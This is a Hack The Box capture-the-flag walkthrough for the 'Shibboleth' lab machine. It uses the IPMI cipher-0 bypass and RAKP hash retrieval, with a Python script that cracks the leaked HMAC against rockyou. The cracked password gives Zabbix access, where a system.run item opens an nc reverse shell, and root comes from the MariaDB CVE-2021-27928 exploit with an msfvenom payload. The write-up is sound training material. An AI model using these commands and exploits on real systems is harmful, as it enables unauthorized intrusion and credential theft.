Hack The Box Writeup - Shibboleth

Port - Enumeration

As always, we start by scanning the target machine’s open ports:

└─$ rustscan -a shibboleth.htb -- -sC -sV -oN port_scan

PORT     STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Apache httpd 2.4.41
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: FlexStart Bootstrap Template - Index

We get back the following result showing that only one port is open:

• Port 80: Apache version 2.4.41

This seemed a bit strange for a medium box, so I also started a UDP port scan in the background:

┌──(kali㉿kali)-[~/HTB/machines/shibboleth]
└─$ sudo nmap shibboleth.htb -sU -p1-10000

In the meantime, let’s have a look at the found port 80.

Port 80

Opening the web application in the browser, we see a marketing-website for a company called “FlexStart”

The website itself does not reveal any useful information nor provides any functionalities. The next step therefore is to scan for directories and subdomains.

┌──(kali㉿kali)-[~/HTB/machines/shibboleth]
└─$ feroxbuster -u http://shibboleth.htb -w /usr/share/seclists/Discovery/Web-Content/common.txt 

<lots of assets>

The scan does not reveal any interesting files or directories.

However, we find 3 subdomains namely monitor, monitoring and zabbix.

Looking at all three subdomains, we see the same application: A login for Zabbix

My current assumption here is that all these subdomains map to the same application.

Zabbix

Zabbix is an enterprise-class open source distributed monitoring solution. Zabbix is software that monitors numerous parameters of a network and the health and integrity of servers, virtual machines, applications, services, databases, websites, the cloud and more. Zabbix uses a flexible notification mechanism that allows users to configure e-mail based alerts for virtually any event. This allows a fast reaction to server problems. Zabbix offers excellent reporting and data visualization features based on the stored data. This makes Zabbix ideal for capacity planning. Zabbix supports both polling and trapping. All Zabbix reports and statistics, as well as configuration parameters, are accessed through a web-based frontend. A web-based frontend ensures that the status of your network and the health of your servers can be assessed from any location. Properly configured, Zabbix can play an important role in monitoring IT infrastructure. This is equally true for small organizations with a few servers and for large companies with a multitude of servers. (https://www.zabbix.com/documentation/5.0/en/manual/introduction/about)

Apparently, this software offers a lot of functionalities that might come handy for obtaining more information about the system. Unfortunately we need credentials to log in (default passwords like admin:admin don’t work). So, we are stuck again.

Port 623

Remember that we still had a UDP scan running in the background? Well, it finally got some results. There is an open UDP port!

┌──(kali㉿kali)-[~/HTB/machines/shibboleth]
└─$ sudo nmap shibboleth.htb -sU -p1-1000 
623/udp open  asf-rmcp

Port 623 asf-rmcp, hmmmm … never heard of it. Let’s do some research.

(All information taken from https://www.rapid7.com/blog/post/2013/07/02/a-penetration-testers-guide-to-ipmi/)

“Baseboard Management Controllers (BMCs) are a type of embedded computer used to provide out-of-band monitoring for desktops and servers. These products are sold under many brand names, including HP iLO, Dell DRAC, Sun ILOM, Fujitsu iRMC, IBM IMM, and Supermicro IPMI. BMCs are often implemented as embedded ARM systems, running Linux and connected directly to the southbridge of the host system’s motherboard. Network access is obtained either via ‘sideband’ access to an existing network card or through a dedicated interface. In addition to being built-in to various motherboards, BMCs are also sold as pluggable modules and PCI cards. Nearly all servers and workstations ship with or support some form of BMC. The Intelligent Platform Management Interface (IPMI) is a collection of specifications that define communication protocols for talking both across a local bus as well as the network. This specification is managed by Intel and currently comes in two flavors, version 1.5 and version 2.0. The primary goal of Dan Farmer’s research was on the security of the IPMI network protocol that uses UDP port 623. A diagram of the how the BMC interfaces with the system is shown below (CC-SA-3.0 (C) U. Vezzani).”

“BMCs are often under appreciated and overlooked during security audits. Like many embedded devices, they tend to respond slowly to tests and have a few non-standard network services in addition to web-based management. The difference between a BMC and say, a printer, is what you get access to once it has been successfully compromised. The BMC has direct access to the motherboard of its host system. This provides the ability to monitor, reboot, and reinstall the host server, with many systems providing interactive KVM access and support for virtual media. In essence, access to the BMC is effectively physical access to the host system. If an attacker can not only login to the BMC, but gain root access to it as well, they may be able to directly access the i2c bus and Super I/O chip of the host system. Bad news indeed.”

Default usernames and passwords:

Authentication Bypass via Cipher 0

“Dan Farmer identified a serious failing of the IPMI 2.0 specification, namely that cipher type 0, an indicator that the client wants to use clear-text authentication, actually allows access with any password. Cipher 0 issues were identified in HP, Dell, and Supermicro BMCs, with the issue likely encompassing all IPMI 2.0 implementations. It is easy to identify systems that have cipher 0 enabled using the ipmi_cipher_zero module in the Metasploit Framework. “

For this, the username must be guessed correctly, but as seen in the table above, there are only a few options.

┌──(kali㉿kali)-[~/HTB/machines/shibboleth]
└─$ ipmitool -I lanplus -H shibboleth.htb -U Administrator -P test -C 0 user list      
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      false      USER
2   Administrator    true    false      true       USER

IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval

“More recently, Dan Farmer identified an even bigger issue with the IPMI 2.0 specification. In short, the authentication process for IPMI 2.0 mandates that the server send a salted SHA1 or MD5 hash of the requested user’s password to the client, prior to the client authenticating. You heard that right - the BMC will tell you the password hash for any valid user account you request. This password hash can broken using an offline bruteforce or dictionary attack. Since this issue is a key part of the IPMI specification, there is no easy path to fix the problem, short of isolating all BMCs into a separate network.”

Instead of using the metasploit module auxiliary/scanner/ipmi/ipmi_dumphashesi, I tried to do it manually.

So, the first step is to get the password hash of the user. This should be fairly easy, as the server will send us the hash, once we connect to it. In order to connect, we use a tool called ipmitool.

┌──(kali㉿kali)-[~/HTB/machines/shibboleth]
└─$ ipmitool -I lanplus -H shibboleth.htb -U Administrator -P fluffy-wuffy chassis -vvv

...
<<  Key exchange auth code [sha1] : 0x2996d1ff0b116d7121768c1a543e9fcbe4ca1573

bmc_rand (16 bytes)
 d0 ad d7 34 df f6 07 31 a0 83 54 85 83 a6 6d 62
>> rakp2 mac input buffer (71 bytes)
 a4 a3 a2 a0 04 1a 00 00 b0 29 ff 4b f6 88 90 c8
 c5 d0 f7 da c7 d6 c9 b7 d0 ad d7 34 df f6 07 31
 a0 83 54 85 83 a6 6d 62 a1 23 45 67 89 ab cd ef
 a1 23 45 67 89 ab cd ef 14 0d 41 64 6d 69 6e 69
 73 74 72 61 74 6f 72
>> rakp2 mac key (20 bytes)
 31 32 33 34 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00
>> rakp2 mac as computed by the remote console (20 bytes)
 23 1b f4 75 5d 14 c5 48 37 d4 44 7f 4b 14 e8 c3
 9a a0 c8 5c
> RAKP 2 HMAC is invalid
...

Here, the Key exchange auth code is the hash that was generated by the server using the correct password. rakp2 mac input buffer is the data for which the HMAC will be generated and rakp2 mac key is the key/password which we provided (=1234).

To find the correct password, we simply have to write a small script that takes passwords from a wordlist as input for the key to generate HMACs. If the generated HMAC matches the one transmitted by the server (Key exchange auth code), we know that the password is correct.

from hashlib import sha1
import os
import hmac

PASSWORD_FILE_PATH = "/usr/share/wordlists/rockyou.txt"
lines = os.popen("wc -l " + PASSWORD_FILE_PATH ).read().split()[0]
# rakp2 mac input buffer
raw = bytes.fromhex("a4a3a2a0041a0000b029ff4bf68890c8c5d0f7dac7d6c9b7d0add734dff60731a083548583a66d62a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72")
# Key exchange auth code
correct_hash = "2996d1ff0b116d7121768c1a543e9fcbe4ca1573"

def read_by_line(file_object):
    while True:
        try:
            data = file_object.readline().strip()
            if not data:
                raise Exception()
            yield data
        except Exception:
            yield "novaliddata"

print("[+] Starting IPMI/RAKP2.0 Cracking")
with open(PASSWORD_FILE_PATH, "r") as f:
    for index, password in enumerate(read_by_line(f)):
        if index % 50000 == 0:
            print(f"\t... (Password {index}/{lines})")
        key = password.encode()
        hashed = hmac.new(key, raw, sha1)
        if hashed.hexdigest() == correct_hash:
            print(f"[+] FOUND PASSWORD: {hashed.hexdigest()}:{password}")
            break

┌──(kali㉿kali)-[~/HTB/machines/shibboleth]                                                                                                                                                                                                 
└─$ python3 rakp_ipmi_cracker.py            
[+] Starting IPMI/RAKP2.0 Cracking                                                                                                                                                                                                          
        ... (Password 0/14344385)                                  
        ... (Password 50000/14344385)                                    
        ... (Password 100000/14344385)                                           
        ... (Password 150000/14344385)                                          
        ... (Password 200000/14344385)  
        ...
        ...
        ... (Password 5250000/14344385)
        ... (Password 5300000/14344385)
[+] FOUND PASSWORD: 2996d1ff0b116d7121768c1a543e9fcbe4ca1573:ilovepumkinpie1

There we go! The password for the user Administrator is ilovepumkinpie1. Let’s try to use this password for the Zabbix login.

And it works! We now have access to the Zabbix Dashboard!

Zabbix Dashboard

Reading the documention of Zabbix reveals that we can add new items in which we can specify commands that should be executed once a particular event ocurrs. To add a new item, we have to go to Hosts -> Items -> Create Item.

It also tells us that we can run system commands by defining a Zabbix item with the key system.run[command, <mode>]. So let’s try to establish a reverse shell by providing the corresponding system command.

system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.27 4444 >/tmp/f &,nowait]

However, the problem is that we cannot trigger this item as long as we have not assigned this item to an event. But … Zabbix provides a Test function, with which we can test our newly created item (see screenshot at the very bottom). So in order to get the reverse shell, we first have to first a nc listener on our machine listening on the specified port within the command then simply press Test.

Et voila… we have a shell as user zabbix.

Privilege Escalation

Since we are the zabbix user, we now have full access to all Zabbix application files. The most interesting one is located at /etc/zabbix/zabbix_server.conf. This file contains all configurations for Zabbix including the database password bloooarskybluh and some more information on the database such as the version 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04. (btw this password is also the password for the user ipmi-svc but it’s not really required to be logged in as that user for the priv esc)

Great! So now we can connect to the database with the command mysql -u zabbix -p to look for further information. Here we have tons of information but nothing that really helps us. Hm….

I then did a quick lookup to see if this database version is vulnerable. And indeed! According to this documentation this version has an RCE vulnerability labeled as CVE-2021-27928.

“An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying wsrep_provider and wsrep_notify_cmd.” (https://packetstormsecurity.com/files/cve/CVE-2021-27928)

So, by following the described steps we can successfully obtain a root reverse shell:

First, we need the reverse shell payload as a shared library file (run msfvenom on your local machine and then transfer it to the victim machine via an http server):

ipmi-svc@shibboleth:/tmp$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so

Afterwards, we connect to the database while also specifying the wsrep_provider option, which defines the path to the galera replication plugin. In order to exploit this database version, all we have to do is to set this path to our reverse shell file. Of course, a nc listener should be running on our attacker machine to retrieve the callback from the exploit.

ipmi-svc@shibboleth:/tmp$ mysql -u zabbix -p -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'

If everything works, we obtain a reverse shell as root on our machine!